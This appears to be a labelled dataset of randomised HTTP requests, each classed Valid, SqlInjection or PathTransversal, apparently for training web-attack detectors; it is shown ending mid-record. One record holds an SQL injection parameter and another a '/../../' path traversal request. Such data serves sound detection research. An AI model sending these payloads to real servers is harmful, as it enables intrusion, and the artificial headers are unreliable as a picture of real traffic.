Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: s-rhne, nsttth-vhto;q=0.0, htiae-t3Etmsar
Cache-Control: only-if-cached
Client-ip: 145.238.161.146
Cookie: unhrcgesdnoamo=qtealikeconnectlordD&q;vtx2teSt=kL9;iez=1020;inputYSdSK.9j=0dh;cmkfm4tmEcbt8mo=666;iu1becof=rxq3asdqlce1xt
Cookie2: $Version="72"
Date: Sat, 11 Dec 04 03:07:00 GMT
ETag: W/"z@PRZXujoWJ8d37tNc"
Expect: 100-continue
From: secins@cI7fv.st
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Thu, 02 Dec 04 20:02:58 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Oct 09 07:43:04 CET
Max-Forwards: 0
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic ZnV0eGFyaW86aWVhcTE=
Authorization: Basic ZDNvNWV1eHQ6Z285dA==
Range: 2-
Referer: http://oilr.uk/yiotf/dreoi/ierlLln/klot/snfp.swf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: e3hpU-@ http://www.2trger.biz
UA-CPU: StrongARM
UA-Disp: 974,667,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0542x2765
Via: HTTP/4.4 www.dlOi4.png, HTTP/3.7 209.67.29.134, 8.7 www.mFrv.htm
Transfer-Encoding: yutoa; sadpoahy=4shaqsoe
Upgrade: hhes/4.9
Warning: 630 165.43.67.238 "oiaisyhuss" "Fri, 25 Jul 08 21:17:53 GMT"
X-Forwarded-For: 225.114.104.225
X-Serial-Number: 3004576514
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21536
Start - Id: 28739
class: Valid
GET /nEwCht/oR2.mABlF-qTD1sA8/0jhE.js?nErbkte=w_JVenYQ&tEo9ixoc656aduo=rn0lNuvksstl&r0lyp4dcusrtgr=4843&sni1=daoIbhha%3Ci%28io&rJuM10=jf9s&s8anwty75dof=324&F68L=2315298665&kl=sCzqS--v1ePM&sasa4tr5ytya=awscriptwat&yraren=arazriePfe&nrnAhsu=E%26%2B HTTP/1.1
Host: 133.87.114.124
Connection: o6veowi4
Accept: text/plain;q=0.1, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: gzip
Accept-Language: pt-xe7;q=0.8, voT-cohcil, oafhmz0j-ouenUvl;q=0.5
Cache-Control: only-if-cached
Client-ip: 105.138.136.198
Cookie: uaodatcbyn=a;rlasuA0pr=1
Cookie2: $Version="3"
Date: Sun, 22 Oct 06 21:21:59 GMT
ETag: W/"uHeNxROFS0GmqDb"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 01 Jun 06 11:40:49 UTC
If-Unmodified-Since: Fri, 06 Nov 09 18:36:40 GMT
If-Match: *
If-None-Match: *
If-Range: "ylOmC7ViE44foAxGIo"
Max-Forwards: 30
MIME-Version: 8.9
Pragma: eie4y='sr'
Proxy-Authorization: Digest nonce
Authorization: leenm tunetoit=agEociN
Range: 6-,-165
Referer: http://www.tAxihBIo.uk/9teem/hesro/ehodhR.doc
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: eY5sengibal
UA-CPU: MIPS
UA-Disp: 062,8206,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 621x541
Via: 6.4 www.fdpeeh5l.css:017, HTTP/5.2 www.nroaae6.css
Transfer-Encoding: compress
Upgrade: olt/8.4, ims0ht/1.8, kbAWuk/5.7, nca/7.3, rYdmr/0.3
Warning: 641 www.lsaHatx.html "tfmibtapeesks4ti" "Thu, 25 Mar 04 07:54:34 UTC"
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 4663959328161
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 28739
Start - Id: 885
class: Valid
GET /5awNAmn/9jPIiW5VZvOxYtdo3/rqP7FGONi90Eu/FtZEGE1/lhtpassP/lo/fWfOUdF1-XM/UVfPaAku-_.gif? HTTP/1.1
Host: 170.243.49.218
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1255;q=0.7, euc-jp, us-ascii;q=0.7, windows-1250, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=72
Client-ip: 81.63.12.137
Cookie: WCqEMofYh=h;OziTgsESXv=425032028;ymAeeZ0=623;dKQ@=sehefisGhttps&nsrth;l0icelhh=2do/r
Cookie2: $Version="2"
Date: Sat, 05 Dec 09 19:18:29 CET
ETag: "bvXf2@2-.8ExwDX"
Expect: 100-continue
From: Ou2tor@taoe.fr
If-Modified-Since: Thu, 07 Apr 05 24:04:54 GMT
If-Unmodified-Since: Thu, 20 Aug 09 18:44:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 11 Nov 05 17:53:22 GMT
Max-Forwards: 9
MIME-Version: 0.0
Pragma: 8ws='ni'
Proxy-Authorization: Basic ZW5lRGVhOmthbnRuUjJz
Authorization: NTLM dGFhQWhxZWFoYTNhdGVwZDlkd0VPTkVpYW5vaWVyZE5Ec2FhUmk2dmVzNXN3dQ==
Range: 03-,31-18005,845834-77348
Referer: http://Tvhln.biz/o4ie/ulse2RAt/lnldR5/us4hnBh/ToTyoe.asp
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.9 (Windows; U; WinNT 0.0; ea-wm; rv:0.2.5) Gecko/52034003
UA-CPU: 68000
UA-Disp: 1675,0086,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 848x029
Via: HTTP/8.4 www.iqsmnd.html, 6l0rm/0.8 120.89.180.152, FTP/4.9 92.205.113.225
Transfer-Encoding: ee9is
Upgrade: qos/8.5, uhncee/1.8, heeaj/4.9, Eng9hD/1.7, teo/3.0
Warning: 739 www.M13tf.tiff "wbiCnlbr1oeamRa0" 
X-Forwarded-For: 168.48.15.93
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 885
Start - Id: 41869
class: SqlInjection
GET /sXUaaTWY8yiD5t/libUKxmlpwq/8lry/e1Ejea6eo9xk/V88I/es_t.S8rGNUS3j/mb/otcwcterbrs/@e_/ld1t/wgolOj.aspx?mfapa=858&HTncBcu=e+eha&elafsEwhiHhevr1=meta&ScliinputyU=0&oaot=bUao6OcksNRz&nuunp=iwVz-sb&oc=a+y&zroekhrjciw=OR+%27mlgoo%27++%3D+++++N%27+++++%27&rJW_iframezpBR=aHeoi&EArIfD=n4_ShI&JD2cZxmlTKKGnp=accept+4Regall%4013pt5ttnSon&JZteA3.=nph-insert&Tmt3eoocrmwsh=oe+%2B HTTP/1.1
Host: www.e3jE.org:80
Connection: keep-alive
Accept: audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.1
Accept-Language: ptze0Toa-heaexd, aeb7-es;q=0.5, g3-lawpbd;q=0.0
Cache-Control: max-age=41427
Client-ip: 174.237.136.128
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="776"
Date: Wed, 09 Nov 05 04:17:31 UTC
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: hkedgyn
From: alubns@ssude.cz
If-Modified-Since: Sat, 02 Jan 10 24:30:58 UTC
If-Unmodified-Since: Fri, 08 Feb 08 01:48:16 CET
If-Match: "la9iVkyTPT8pprU3THiD"
If-None-Match: "t6mszVq2X.btelb"
If-Range: Mon, 16 Oct 06 17:17:29 GMT
Max-Forwards: 16
MIME-Version: 7.2
Pragma: e3t5=ovittaao
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: http://ia2q.com/RsolI/nEuA.swf
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: e72Nhea
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: 2.6 28.142.120.233, HTTP/5.7 www.8esE.html, FTP/7.0 www.tneef.htm:47165
Transfer-Encoding: wlhee
Upgrade: prc/4.5, 2sFe/0.3
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41869
Start - Id: 19165
class: Valid
GET /aSmE.mspx?mdse5oelfU=85&a1=51968&Ntoie=input%40e&srnrs=i%24ae5sulse+oran&qaituirdd=71&seAcbsoofilT=Er8aarpau HTTP/1.0
Host: 24.187.9.91
Connection: close
Accept: image/gif, video/mpeg;q=0.2, audio/*
Accept-Charset: x-mac-turkish, iso-8859-3;q=0.2, x-mac-cyrillic, windows-874
Accept-Encoding: 
Accept-Language: eye-fwwen
Cache-Control: no-transform
Client-ip: 83.11.35.255
Cookie: Sd6ah6aparh9oO=87387285
Cookie2: $Version="331"
Date: Mon, 19 Jun 06 02:03:02 GMT
ETag: "JKdo902.JrP1q_5Ym8X3"
Expect: 100-continue
From: sls8@HHNtidid7.ch
If-Modified-Since: Sun, 11 Jul 04 01:56:18 UTC
If-Unmodified-Since: Fri, 07 Jan 05 17:45:17 GMT
If-Match: "q10zJx9R3z0U1afkyJLm"
If-None-Match: "ngzRGU4Lwncvs3ikx"
If-Range: Fri, 20 Feb 04 18:54:33 UTC
Max-Forwards: 5405
MIME-Version: 6.6
Pragma: lc=Ho
Proxy-Authorization: seed uhnsrr=8hieutI
Authorization: iglt uaetu=eylgoq4
Range: -26751,992963-79665,-06526
Referer: http://www.hsnhc.cz/bv5fa/tueIre/itNloT8/ushg/ihloi8t8.cgi
TE: chunked;q=0.8,trailers
Trailer: TE
User-Agent: dT0d (sO5Onv146a; toqN3C0; aE4B53x1e; oFZ.K_TYn)
UA-CPU: MIPS
UA-Disp: 070,359,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: HTTP/8.8 www.heee.shtml, FTP/9.9 www.slns.tiff
Transfer-Encoding: gzip
Upgrade: rtecO/7.7, YhdLe/3.7, hose/2.0, 6szce/9.1, ide47/9.2
Warning: 693 239.139.121.216 "lqenTohNatwk" 
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19165
Start - Id: 20884
class: Valid
GET /Ur1wHP/PYDUkw9i/GKtuLuSzDeVCEautoexec/eVbRXzC3LqMXk.OVmh/wtybiqwuptemhdatm2/sesEn/hyuK-yZ3/h4K/fu/mn.html?nF2amylwheeewy=7024 HTTP/1.1
Host: www.i8ieess3.com
Connection: close
Accept: audio/basic;q=0.7, audio/basic, text/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 67.83.27.83
Cookie: X.sock_streamFiLZPVevalxq=Rkiesystemsnn
Cookie2: $Version="19"
Date: Sun, 11 Jun 06 20:42:53 CET
ETag: W/"w2kRn@NKQUz0.cL"
Expect: ef4mTus
From: eot6xm@geemirrlzt.biz
If-Modified-Since: Fri, 06 Mar 09 20:41:23 UTC
If-Unmodified-Since: Sun, 26 Jul 09 15:19:41 UTC
If-Match: "qQM5.iAMVdUAVYH"
If-None-Match: "jP1eI1J_BjX73WNH9Bc"
If-Range: Mon, 23 Mar 09 10:22:30 CET
Max-Forwards: 88
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RHJpZGJ5YTk6OFhpdHJlYg==
Authorization: Digest username="ftot1o"
Range: 90-96,-579803,-6
Referer: http://www.tali31.net/eCmIt/4ohnst/reei/6ytida.tar.gz
TE: chunked;q=0.8,gzip;q=0.8
Trailer: TE
User-Agent: oQbratteeecshi9suS
UA-CPU: PowerPC
UA-Disp: 743,400,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0585x0395
Via: ilibtc/8.5 www.tm2oOoy.jpeg
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 138.202.93.19
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20884
Start - Id: 29910
class: Valid
GET /hw9SyfU1nutv5lpue/but_LT/fUWXy2asvODjdaccept@/r1wL/ex6Y9eCh@QWamphoP6/avtnearIbaaO/oqWrQp9Q1ff@h/wlheoa8tsesdelc2/l1W26.php3?eytDu0rma4sxe=whereznetcateariaOe+pn&3teqoa=x6&fhfExiopLrH4=Eelc&htep0Tdya=57&gilnsE=0&cmeqcadlsyv=5e.&nnmcwOQit1=5002&wihoiaoftefj=3645945618&O0xtermpHuFTCdGA=81399273&ouah=7Hahulib0d&araibhu=witaoeefsehotbpojq&aeav6ot=90 HTTP/1.1
Host: 53.116.18.111:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.5, iso-8859-4
Accept-Encoding: identity;q=0.2, gzip, deflate, deflate;q=0.6, identity;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 62.30.118.125
Cookie: Aotag=st imgt%uhssupdate8a;sworhet3=seoLraheiban6u;hKdrcp4PMSvar1Mu=517
Cookie2: $Version="15"
Date: Fri, 23 Mar 07 07:15:45 UTC
ETag: W/"7MRCAMCo4sZHzVITp"
Expect: 100-continue
From: uudtsny@Iiar7.st
If-Modified-Since: Sat, 21 Feb 09 11:09:57 UTC
If-Unmodified-Since: Sun, 23 Jan 05 24:48:57 CET
If-Match: "Ot8WDR3KHAJx7hT3d"
If-None-Match: "h.JJJCSfv@_xQ8vk6"
If-Range: *
Max-Forwards: 291
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Basic YWs4ZTpuYWtt
Range: 73-062771
Referer: /rwnwPne.txt
TE: chunked;q=0.7
Trailer: If-Match
User-Agent: qigs3omrn (aGYmKuM; hDD.jgJ)
UA-CPU: 68000
UA-Disp: 5197,782,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3101x221
Via: 4.7 5.239.91.78, 1.4 www.onbMfq.htm, FTP/5.0 15.46.138.36
Transfer-Encoding: gzip
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 601 103.90.185.56:00009 "bInvy9od2reoewohbO" "Thu, 26 Mar 09 12:32:40 UTC"
X-Forwarded-For: 221.63.83.226
X-Serial-Number: 89410
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29910
Start - Id: 20648
class: Valid
GET /kr/eo3fQ9MN_F/monooovw8onodltt/EyHMu5Ir2D-2/pG47FBCv/diehgttdobHzp8tll/KiframenW7iIDscriptEusr/TfCS6gt/KJTkjgall3QusrlLA0/s2f_GpRd.pl?@VVU-npM=fMdEzOl&dPEfhohae29i=1364&fsh1R6wOnsA=5hh&acnaanbshi8Zayp=430608&moc=5430159&D_8hfC0=asouToa%3E%7Elibeoenge&igesfa2hinmee=nh9enb3sbn&TCFWmD=connect5u&r5e=+%28s+&aaen=uR77mbq%40&bhttpninputx.AlcJxa=iteroo2cannika5nt8 HTTP/1.0
Host: www.iji2.de:80
Connection: close
Accept: application/*;q=0.4, video/*;q=0.7, application/zip
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 176.169.150.86
Cookie: uyr=b-bhNtr_H;eEmdapd5sltek1=oXQwv1qLn;cAginlacb0ec=bilxp_Ntov;4suwtsq=a
Cookie2: $Version="664"
Date: Tue, 27 Sep 05 12:04:41 CET
ETag: W/"HEyUQ3L22qWacZ8Bn"
Expect: aoqjTuhe
From: ihe4r@bhoxbwdih.net
If-Modified-Since: Wed, 23 Aug 06 10:01:57 CET
If-Unmodified-Since: Mon, 21 Nov 05 13:02:47 UTC
If-Match: *
If-None-Match: "Qvu7mPYRoMeam0k"
If-Range: "erreimeXw7xnv9Y2g3RV"
Max-Forwards: 7
MIME-Version: 1.6
Pragma: r='ttieteta'
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: Digest realm
Range: 833047-0828
Referer: /gie6la/e0imsr.wav
TE: gzip,trailers
Trailer: Host
User-Agent: aT3iaayNrEEzd6ksao
UA-CPU: 68000
UA-Disp: 1458,0432,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 323x7218
Via: ode0A/8.8 127.197.242.170
Transfer-Encoding: gzip
Upgrade: dniQh/1.0, k7y/8.9
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 188.182.199.121
X-Serial-Number: 5076474015762561578
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20648
Start - Id: 21952
class: Valid
GET /iPO9Z3G/j8Oe/enWT6cE/yeUOweEw70fG-dPBBQ6@/gxw9/bUlIqKwriI53nW/rdnxeaotass/hVN-4nteeG/IusrGiP/o_zJ4e-m/aSGM4b./e41._@Tmm3jXWxDG-9c.php?nmby=bRmtihttphttptee3S%3A HTTP/1.0
Host: www.olma4aEre.net
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity, deflate, identity, gzip;q=0.2
Accept-Language: ne6-oo0jE, Hs-sKlme;q=0.9
Cache-Control: only-if-cached
Client-ip: 191.101.191.71
Cookie: mol=ovAftadsooTn;0yefuqwinof=objectt$bo;LIpxO2q9ZVS=a-Nb@LER;Ns0hLcssfaoovpo=h9WiiXnaofrrwm
Cookie2: $Version="04"
Date: Wed, 26 May 04 07:18:42 GMT
ETag: "h--L.A88i-u9EG1sS"
Expect: 100-continue
From: o5dwea@emautz6.org
If-Modified-Since: Thu, 17 Jul 08 22:39:26 GMT
If-Unmodified-Since: Mon, 28 Mar 05 13:52:31 GMT
If-Match: "cLaDUbs8Yk4@2vM8"
If-None-Match: "iEqTNc1iwlUlG2cOg_z"
If-Range: Thu, 01 Jan 09 08:41:39 UTC
Max-Forwards: 1
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Basic dHR2dW5lcG86YXNsd25m
Range: 81-3452
Referer: http://www.oaeeeha.fr/iytt/jnr7/mreeTje/rseeax/elge.pl
TE: deflate
Trailer: If-Match
User-Agent: muLjRrIff http://www.esdb.st
UA-CPU: x86
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 501x9134
Via: 5.5 www.ttsa.tiff, aHiAgO/9.8 74.217.9.245:49588, 5.1 www.nenceoeo.htm
Transfer-Encoding: identity
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 133.218.232.127
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21952
Start - Id: 9821
class: Valid
GET /enb3hoiyesie9Ey1hrs/irb0.qZwBNb0-/a1elcfuMew1txanm/t94WiNzmh/wn4aztgwnAtu/booberawmUrec5/ivzZ.1.html?dkeoTd=wtg5y&setdcHrdyE8=88770 HTTP/1.0
Host: www.a6VtisL.fr:36505
Connection: keep-alive
Accept: application/rtf, text/xml;q=0.8, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: OtIpf-kcb;q=0.0, qyl-y4sLih;q=0.1, natArb-ad4;q=0.6, loOiy-sTn
Cache-Control: min-fresh=9102
Client-ip: 239.65.77.186
Cookie: rtoGneoaetgee7r=3OtmiE8jaasse;Ns4txpB=:dnlls25E'
Cookie2: $Version="48"
Date: Mon, 05 Feb 07 03:23:05 GMT
ETag: W/"N2N-Rg1.o4nph3fnVB"
Expect: hyenHipf
From: s2ee@yeibttnums.uk
If-Modified-Since: Wed, 25 May 05 10:32:58 GMT
If-Unmodified-Since: Thu, 25 Nov 04 04:29:22 CET
If-Match: *
If-None-Match: ".h8h8kpcexJzlDv8y4"
If-Range: Tue, 29 Aug 06 07:28:05 UTC
Max-Forwards: 538
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest qop=dARhoRu
Authorization: NTLM dXJsMlJlbTJnNWV0MHNFbmF3OGFldWRORGlvaHhhdWhObm5yb2ZzaWZncmVzZg==
Range: -6
Referer: /hqhn/njac.gz
TE: chunked,trailers,chunked
Trailer: Via
User-Agent: no1raacee/3.3
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: FTP/0.2 2.51.180.216:970
Transfer-Encoding: lots9
Upgrade: irldv/6.7
Warning: 093 www.qy84ose.js "sotfb3eWg" "Sat, 25 Dec 04 19:24:10 UTC"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 09946739061718
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9821
Start - Id: 17398
class: Valid
GET /8wPC39/sbA/i7reolmRjEuus/eZHJ9/vzroa9ienaohgSpfs.js?ei=9705&VY-rt1NDI35L=o6mslw01shs6td&Bot8=maa+v&fotazsts3ts=t95O&fe=tav7hic&rm4p1Wu0=asWt4-&kDitln2=az++r&66FQB=f3Zi_&imeov=5YZgzlIxz&nNec=httpu&8mrEfdigfha=6&rfsjs=nairhzlccaeis&e0y=5339402&rthnn=9&Bim=30 HTTP/1.1
Host: 3.159.67.184
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, iso-2022-jp, cp-936, iso-8859-2
Accept-Encoding: 
Accept-Language: n0e-pe;q=0.2, e-18aOlr, nrttt-gf1eeRld;q=0.3, lu3-bzotarqi;q=0.4
Cache-Control: no-transform
Client-ip: 101.106.159.200
Cookie: cnrnEofenwsrr=mhd:;lu=17;inmd0e=tesock_stream;fnicyvioeRjef=rSEbuJZ;sHeegdpoRI6o4=ltelnet$ 0dtro<e@iio
Cookie2: $Version="155"
Date: Tue, 01 Feb 05 22:50:53 UTC
ETag: "D2QB6MZqXmCm-axSnt"
Expect: 100-continue
From: hErN7au@nLt0ryhez.uk
If-Modified-Since: Mon, 09 Mar 09 22:51:00 UTC
If-Unmodified-Since: Sat, 15 Aug 09 02:43:35 GMT
If-Match: *
If-None-Match: "lJgUZ@rNFdmhCFgFI"
If-Range: Sun, 31 Jul 05 23:22:16 CET
Max-Forwards: 5817
MIME-Version: 4.7
Pragma: r=eqn
Proxy-Authorization: NTLM ZWFubGU1aGUwOXJucmFyYXNwSGNvaGEwc2JhQmlvb05wSWVycWJlQWQ=
Authorization: rhsail hmwe=2eodlnm
Range: -29
Referer: /teae5/thttzdae/dum3dr.asp
TE: deflate
Trailer: If-None-Match
User-Agent: utteweeoIy (o5Xwy5; 8YVyv19; 8v@cN-; oS@kJiUhQp; oIYqQ9fF)
UA-CPU: 68000
UA-Disp: 436,9131,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3112x2775
Via: 2.4 24.189.43.144:35474, 8.0 www.lnnoMu.htm:2
Transfer-Encoding: compress
Upgrade: skn/5.4, 8st/5.3, tia8to/8.7, wnio/7.7, w2t79p/4.2
Warning: 500 www.ietLLq.png "WitpeagmraOeteXfnE" "Fri, 22 Feb 08 21:37:25 CET"
X-Forwarded-For: 208.220.17.9
X-Serial-Number: 534036492924791
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17398
Start - Id: 45210
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.4Shf.gov:3170
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: tesmpo-oHRniea
Cache-Control: max-age=824
Client-ip: 115.213.88.73
Cookie: sAF%uqfi=reaccess_logftpme
Cookie2: $Version="5"
Date: Tue, 11 Sep 07 11:19:28 CET
ETag: W/"_42@pBjVbX4bYLjRIkl"
Expect: oq0ewer7
From: 1p4rry@estl2a.org
If-Modified-Since: Mon, 07 Aug 06 06:36:56 UTC
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: "uWjapukWjRUFRGf1"
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 35
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: uvaesU naapebE=ehpe
Authorization: Basic ZzBrb29lZTk6M3FlMmQ=
Range: 706278-,584316-,-67
Referer: http://www.rakbenta.biz/Dbia/lhapfs/holetge/eaph3eHt.rar
TE: trailers,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Windows; U; Win98 3.6; ts-ri; rv:4.9.2) Gecko/16071408
UA-CPU: Sparc
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 512x1619
Via: HTTP/1.4 www.3anlhcs.html
Transfer-Encoding: deflate
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 157.255.96.148
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45210
Start - Id: 4166
class: Valid
POST /Mi/i1eD1/dEotnsls3sryno/oIcugrbyKMxr2_/mtsOori2zt/yPSSTZ32h/rcfaUnEndS/wcopenV0rT6kz8w/8GvlLnullsto-QDu/sYU.dll? HTTP/1.0
Content-Length: 207
Content-Language: eWa,bt7alh
Content-Encoding: identity
Content-Location: /slpgts/lsPEprle/ihlaaIb/lnshieu/Xbdn7rnn.cfm
Content-MD5: aWVhU3JIZWFlZWtzaXZhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 04 11:37:20 CET
Last-Modified: Thu, 10 Nov 05 02:08:19 GMT
Host: www.ilvuls6i.be
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: apmo2=rhca
Client-ip: 165.236.22.163
Cookie: Uyleqdhyhvas7t=Uplvrders
Cookie2: $Version="2"
Date: Wed, 09 Jul 08 14:04:03 CET
ETag: W/"bwiSfMIEH@Zdw2j"
Expect: v2e8=ethed
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Thu, 24 Dec 09 23:18:49 CET
If-Unmodified-Since: Sun, 22 Jul 07 01:49:58 GMT
If-Match: *
If-None-Match: "nImZHRa8Txpoghq6"
If-Range: "d4RbXsQEJl2lVMj"
Max-Forwards: 3
MIME-Version: 0.5
Pragma: ehn='7ou7z88s'
Proxy-Authorization: NTLM dUg3bXQxdWl1b2VJZVFtZmlvckNibkllYXVuc2NkaHJyMDFwZQ==
Authorization: NTLM cjNsSW81ZmlpdGVzT2lvZW5hbW44bmMwdDlSb2JlaGlocw==
Range: -9,-905
Referer: http://onIg.ch/rtelaoc/aDuyeaz.pl
TE: trailers,gzip,chunked
Trailer: Max-Forwards
User-Agent: kdue1rnt/0.3.5.9.2
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 123x6429
Via: 5.4 150.138.240.119:225, HTTP/2.1 www.inelP.gif
Transfer-Encoding: compress
Upgrade: maaos/1.6, n6uCnT/5.4, e8Lemk/6.4, iDong/6.0
Warning: 033 www.ht6forRg.shtml "vwcfh1evolhtnobct" 
X-Forwarded-For: 182.55.25.220
X-Serial-Number: 5833814723
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tHv=aoO&lewt1UxM2zm=5013&eageeeynt6jehoa=214&aeeIauvtsE6s=;Oas&pSa8de69u=57&tKrV6=positionwindow.open?p:u0phpt(uniont[%uyb Ubgsound&kqnnfoetD=thDnu&m6.BLetcT=e php&6i8scps=eGtceceguuuJa&dI=185312

End - Id: 4166
Start - Id: 2812
class: Valid
GET /f-pay8.VSDYtk1/rstiWhauheerteeeoers/4n4jonpCST7epmdnu.mspx?n9Egroup byuDTA40=9537863&rsdfFeisau1dv=8M HTTP/1.1
Host: 205.250.217.254
Connection: keep-alive
Accept: application/*;q=0.9, image/jpeg;q=0.8, application/postscript
Accept-Charset: x-mac-turkish;q=0.4, x-mac-hebrew, iso-8859-1;q=0.4, macintosh;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: 4Mt-0f;q=0.8, dils9-can
Cache-Control: no-store
Client-ip: 161.229.249.9
Cookie: ANdWfT=afdx4zn;atthroeatbi=Elformdrr;5eed=iep;fyiclzrt=0720236147;seyqA=lma
Cookie2: $Version="0"
Date: Fri, 20 Jun 08 04:39:25 CET
ETag: "m7IJo_S-76ZKUca4Re"
Expect: 100-continue
From: iReicda@4nt3rlflA.st
If-Modified-Since: Mon, 13 Apr 09 09:40:20 GMT
If-Unmodified-Since: Wed, 09 Mar 05 04:25:07 UTC
If-Match: *
If-None-Match: "Ig7snfDx_m0cJWtR0j"
If-Range: Wed, 06 Feb 08 23:57:53 UTC
Max-Forwards: 8
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: Basic bHRFdXQ6cnc4dXQ=
Range: 653260-,8-79,061108-10
Referer: http://ltiM4u.ch/eec0o/nhoad/ny6nnlo.doc
TE: deflate;q=0.6,trailers,trailers
